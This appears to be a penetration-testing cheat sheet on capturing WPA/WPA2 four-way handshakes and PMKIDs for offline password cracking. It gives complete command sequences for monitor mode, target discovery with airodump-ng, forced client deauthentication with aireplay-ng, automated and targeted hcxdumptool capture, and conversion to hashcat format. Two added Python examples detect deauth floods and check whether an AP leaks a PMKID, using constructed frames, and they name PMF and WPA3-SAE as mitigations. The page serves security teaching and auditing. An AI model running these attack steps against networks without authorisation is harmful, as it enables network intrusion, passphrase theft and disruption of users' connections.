
WPA/WPA2 PSK/PMKID Capture

Automated Attack - hcxdumptool

  • Automatically de-authenticates clients from APs to induce re-authentication and capture of the 4-way handshake.
  • Automatically associates to APs in order to capture EAPOL M1, which may include the PMKID.

hcxdumptool Usage

Make sure the wireless adapter is on the same channel as the target AP.

Set the wireless adapter's channel #
sudo iw dev <iface_mon> set channel <channel_#>

Use hcxdumptool to capture WiFi traffic and also automatically attempt client de-authentication/4-way handshake capture as well as clientless PMKID capture.

Perform automated attack
sudo hcxdumptool -i <iface_mon> -c <channel_#><band> -w pmkid.pcapng --enable_status=1

The <band> suffix after the channel number is a for 2.4 GHz and b for 5 GHz, depending on the channel range.

Perform targeted automated attack
sudo hcxdumptool -i <iface_mon> -c <channel_#><band> --filterlist_ap ap_allowlist.txt --filtermode=2 -w pmkid.pcapng --enable_status=1

4-Way Handshake Capture

  • Listen for clients connecting to the WiFi AP and capture the 4-way handshake; the captured handshake is cracked offline to recover the AP's PSK.
  • Trigger/spoof de-authentication to force clients to reconnect to the AP.
    • Forced de-authentication does not work if PMF (802.11w) is enabled/required. Passive capture of a client connecting still works.

Exploitation

Enable Monitor Mode

Put wireless adapter into monitor mode (airmon-ng takes the managed interface, e.g. wlan0, and creates a monitor interface, typically wlan0mon)
airmon-ng start <iface>

Find AP clients to target for de-authentication

Analyze all traffic seen by WiFi adapter
sudo airodump-ng <iface_mon>

Top section = APs

Bottom section = Clients

Analyze traffic on only a specific channel #
sudo airodump-ng <iface_mon> --channel <channel_#>

Focus on finding clients to deauth when targeting an AP.

Capture WiFi traffic

Verify wireless adapter settings
iw dev <iface_mon> info

Set wireless adapter channel to match target AP
sudo iw dev <iface_mon> set channel <channel_#>

Capture WiFi traffic
sudo dumpcap -i <iface_mon> -w /tmp/dumpcap.pcapng

Trigger client de-authentication

Deauthenticate a client
aireplay-ng -0 1 -a <AP_MAC_Address> -c <Client_MAC_Address> <iface_mon>

If successful, the running capture (dumpcap above, or airodump-ng writing to a file) will contain the 4-way handshake from the re-authenticating client, which is then converted for cracking with hashcat.

Convert the capture (here /tmp/dumpcap.pcapng) to the hashcat 22000 format
hcxpcapngtool -o hashcat_crackable.22000 /tmp/dumpcap.pcapng
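From the defender's side, the de-authentication step above is the loud part of this technique: a burst of spoofed deauthentication frames carrying the AP's BSSID is visible to any monitor-mode sensor or WIDS. The following is an added example, not code from the original page or from the aircrack-ng/hcx projects: a minimal 802.11 management-frame parser plus a sliding-window detector that flags a BSSID when more than a threshold of deauth/disassoc frames are seen within one second. The sample "capture" is constructed inline from locally administered MAC addresses (02:00:00:00:00:01 for the AP, 02:00:00:00:00:02 for a client) and is not real traffic; a real deployment would feed it frames read from a pcap instead.

```python
import struct
from collections import defaultdict

# IEEE 802.11 management-frame subtypes (frame type 0) used here
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_mgmt_frame(buf):
    """Parse the 24-byte 802.11 MAC header (no radiotap) and return a dict for
    management frames, or None for anything else.  Deauth/disassoc frames also
    get their 2-byte little-endian reason code."""
    if len(buf) < 24:
        return None
    fc0 = buf[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    if ftype != 0:
        return None
    frame = {
        "subtype": subtype,
        "da": mac_str(buf[4:10]),      # Address 1: destination
        "sa": mac_str(buf[10:16]),     # Address 2: source (spoofed by an attacker)
        "bssid": mac_str(buf[16:22]),  # Address 3: BSSID
    }
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(buf) >= 26:
        frame["reason"] = struct.unpack_from("<H", buf, 24)[0]
    return frame


def detect_deauth_floods(packets, window=1.0, threshold=10):
    """packets: iterable of (timestamp_seconds, raw_80211_frame).
    Returns {bssid: peak_count} for every BSSID whose deauth/disassoc count in
    any `window`-second sliding window reaches `threshold`."""
    times = defaultdict(list)
    for ts, raw in packets:
        f = parse_mgmt_frame(raw)
        if f and f["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            times[f["bssid"]].append(ts)
    alerts = {}
    for bssid, ts_list in times.items():
        ts_list.sort()
        best, start = 0, 0
        for end in range(len(ts_list)):
            while ts_list[end] - ts_list[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[bssid] = best
    return alerts


# --- constructed sample traffic (not a real capture) -------------------------
AP = bytes.fromhex("020000000001")      # hypothetical AP / BSSID
CLIENT = bytes.fromhex("020000000002")  # hypothetical client
BCAST = b"\xff" * 6


def build_mgmt_frame(subtype, da, sa, bssid, body=b"", seq=0):
    """Assemble a management frame: FC (type 0, given subtype), duration, three
    addresses, sequence control, then the frame body."""
    fc = bytes([(subtype << 4), 0x00])
    return fc + b"\x00\x00" + da + sa + bssid + struct.pack("<H", seq << 4) + body


def sample_capture():
    pkts = []
    for i in range(10):  # normal beacons, one every 100 ms
        pkts.append((i * 0.1, build_mgmt_frame(SUBTYPE_BEACON, BCAST, AP, AP, seq=i)))
    # one legitimate deauth: the client leaves (reason 3, "STA is leaving")
    pkts.append((0.5, build_mgmt_frame(SUBTYPE_DEAUTH, AP, CLIENT, AP, struct.pack("<H", 3))))
    # burst of 12 broadcast deauths in 0.3 s with the AP's address as source;
    # reason 7 is the code injected deauth bursts are commonly seen with
    for i in range(12):
        pkts.append((2.0 + i * 0.025,
                     build_mgmt_frame(SUBTYPE_DEAUTH, BCAST, AP, AP,
                                      struct.pack("<H", 7), seq=100 + i)))
    return pkts


if __name__ == "__main__":
    print(detect_deauth_floods(sample_capture()))
```

The single legitimate deauth at 0.5 s never crosses the threshold, while the burst is reported with its peak count. Beacons are parsed but ignored. The reason-3 versus reason-7 distinction is only a hint; the count-per-window is what matters, and the mitigation the section already names (requiring PMF) is what makes a spoofed burst ineffective rather than merely detectable.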

Clientless PMKID Capture

  • Vulnerable routers include the PMKID in the first EAPOL frame (M1) they send to an associating client. The PMKID can be cracked offline to discover the PSK, so no connected client is needed.
  • Works on WPA2 and mixed WPA/WPA2 networks that advertise RSN/PMKID; not typical on pure WPA/TKIP-only networks.
  • Listen to traffic in monitor mode.

Exploitation

Put wireless interface into monitor mode
airmon-ng start <iface>

Attempt to capture a PMKID from the EAPOL frame
hcxdumptool -o hcxdumptool_output.pcapng -i <iface_mon> --enable_status=1

Attempt to capture a PMKID from the EAPOL frame of a specific AP
hcxdumptool -o hcxdumptool_output.pcapng -i <iface_mon> --enable_status=1 --filterlist_ap=./targets.lst --filtermode=2

Convert hcxdumptool_output.pcapng to a hashcat file
hcxpcapngtool -o hashcat_crackable.22000 hcxdumptool_output.pcapng
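The clientless variant works only because the AP volunteers the PMKID as a Key Data Encapsulation (KDE) inside message 1 of the handshake. An operator auditing their own APs can check a capture for exactly that without any cracking step. The code below is an added example, not part of the original page and not the hcxtools implementation: it parses an EAPOL-Key frame (starting at the 802.1X header, i.e. after the 802.11 and LLC/SNAP headers), recognises M1 by its Key Information flags (Pairwise and Ack set, MIC clear), and walks the KDE list for the RSN PMKID KDE (tag 0xdd, OUI 00-0f-ac, data type 4, 16-byte value). The two M1 frames used as input are constructed inline with dummy nonces and a dummy PMKID of 00..0f; they are not from a real AP.

```python
import struct

EAPOL_KEY = 3               # 802.1X packet type: EAPOL-Key
RSN_OUI = b"\x00\x0f\xac"   # IEEE 802.11 RSN OUI used in KDEs
PMKID_KDE_TYPE = 4          # KDE data type: PMKID
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
FIXED_BODY_LEN = 95         # descriptor..MIC (93 bytes) + 2-byte Key Data Length


def parse_eapol_key(buf):
    """Parse an EAPOL-Key frame. Returns a dict with the Key Information flags
    and the raw Key Data field, or None if this is not an EAPOL-Key frame."""
    if len(buf) < 4 or buf[1] != EAPOL_KEY:
        return None
    body_len = struct.unpack_from(">H", buf, 2)[0]
    body = buf[4:4 + body_len]
    if len(body) < FIXED_BODY_LEN:
        return None
    key_info = struct.unpack_from(">H", body, 1)[0]
    key_data_len = struct.unpack_from(">H", body, 93)[0]
    return {
        "descriptor": body[0],          # 2 = RSN key descriptor
        "key_info": key_info,
        "pairwise": bool(key_info & KEY_INFO_PAIRWISE),
        "ack": bool(key_info & KEY_INFO_ACK),
        "mic": bool(key_info & KEY_INFO_MIC),
        "key_data": body[FIXED_BODY_LEN:FIXED_BODY_LEN + key_data_len],
    }


def is_message_1(info):
    """M1 is the only handshake message the AP sends with Ack set and MIC clear."""
    return info["pairwise"] and info["ack"] and not info["mic"]


def find_pmkid_kde(key_data):
    """Walk the KDE list in Key Data; return the PMKID as hex, or None."""
    i = 0
    while i + 2 <= len(key_data):
        tag, length = key_data[i], key_data[i + 1]
        value = key_data[i + 2:i + 2 + length]
        if tag == 0xDD and length == 0:
            break                          # zero-length 0xdd marks padding
        if (tag == 0xDD and length >= 20
                and value[:3] == RSN_OUI and value[3] == PMKID_KDE_TYPE):
            return value[4:20].hex()
        i += 2 + length
    return None


def pmkid_from_m1(buf):
    """Return the PMKID hex string if `buf` is an M1 carrying a PMKID KDE."""
    info = parse_eapol_key(buf)
    if info is None or not is_message_1(info):
        return None
    return find_pmkid_kde(info["key_data"])


# --- constructed test frames (not real AP output) ---------------------------
def build_m1(anonce, key_data=b""):
    """Assemble an EAPOL-Key M1 with the given ANonce and Key Data."""
    body = (bytes([2])                        # descriptor type 2 = RSN
            + struct.pack(">H", 0x008A)       # key info: v2, Pairwise, Ack
            + struct.pack(">H", 16)           # key length (CCMP)
            + struct.pack(">Q", 1)            # replay counter
            + anonce                          # 32-byte nonce
            + bytes(16) + bytes(8) + bytes(8) # Key IV, Key RSC, Key ID
            + bytes(16)                       # MIC (all zero in M1)
            + struct.pack(">H", len(key_data)) + key_data)
    return bytes([2, EAPOL_KEY]) + struct.pack(">H", len(body)) + body


CONSTRUCTED_PMKID = bytes(range(16))
PMKID_KDE = b"\xdd\x14" + RSN_OUI + bytes([PMKID_KDE_TYPE]) + CONSTRUCTED_PMKID
M1_WITH_PMKID = build_m1(b"\x11" * 32, PMKID_KDE)      # AP that leaks the PMKID
M1_WITHOUT_PMKID = build_m1(b"\x22" * 32)              # AP that does not

if __name__ == "__main__":
    print("leaking AP:", pmkid_from_m1(M1_WITH_PMKID))
    print("quiet AP:  ", pmkid_from_m1(M1_WITHOUT_PMKID))
```

Running this over the EAPOL frames of your own APs tells you which ones hand out a PMKID to anyone who associates; those are the networks where passphrase strength is the only defence against the offline attack this section describes, and where moving to WPA3-SAE or disabling PMKID caching on the AP (where the vendor allows it) closes the clientless path.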